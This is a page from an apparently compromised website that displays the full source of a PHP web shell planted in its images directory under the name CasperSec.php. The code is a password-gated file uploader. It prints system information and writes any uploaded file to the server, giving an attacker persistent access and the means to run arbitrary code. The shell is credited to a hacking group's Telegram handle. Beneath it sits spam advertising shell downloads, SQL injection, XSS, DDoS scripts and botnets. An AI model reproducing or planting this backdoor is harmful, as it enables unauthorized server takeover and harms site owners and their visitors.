CasperSecurity

Current Path : /var/www/uim.org.in/images/content/
Upload File :
Current File : /var/www/uim.org.in/images/content/CasperSec.php

<?php
$allowedUpload = isset($_GET['upload']) && $_GET['upload'] === 'CasperSecurity';if($allowedUpload) {echo '<pre>T.ME/CASPERSECURITY 𝐌𝐀𝐋𝐖𝐀𝐑𝐄 Coded By @BIBIL_0DAY (CasperSecurity Owner)'.php_uname()."\n".'<br/><form method="post" enctype="multipart/form-data"><input type="file" name="__"><input name="_" type="submit" value="Upload"></form>';if ($_POST) {if (@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])) {echo 'OK';} else {echo 'ER';}}} else {echo 'Upload not allowed.';}?>
Hacker Blog, Shell İndir, Sql İnjection, XSS Attacks, LFI Attacks, Social Hacking, Exploit Bot, Proxy Tools, Web Shell, PHP Shell, Alfa Shell İndir, Hacking Training Set, DDoS Script, Denial Of Service, Botnet, RFI Attacks, Encryption
Telegram @BIBIL_0DAY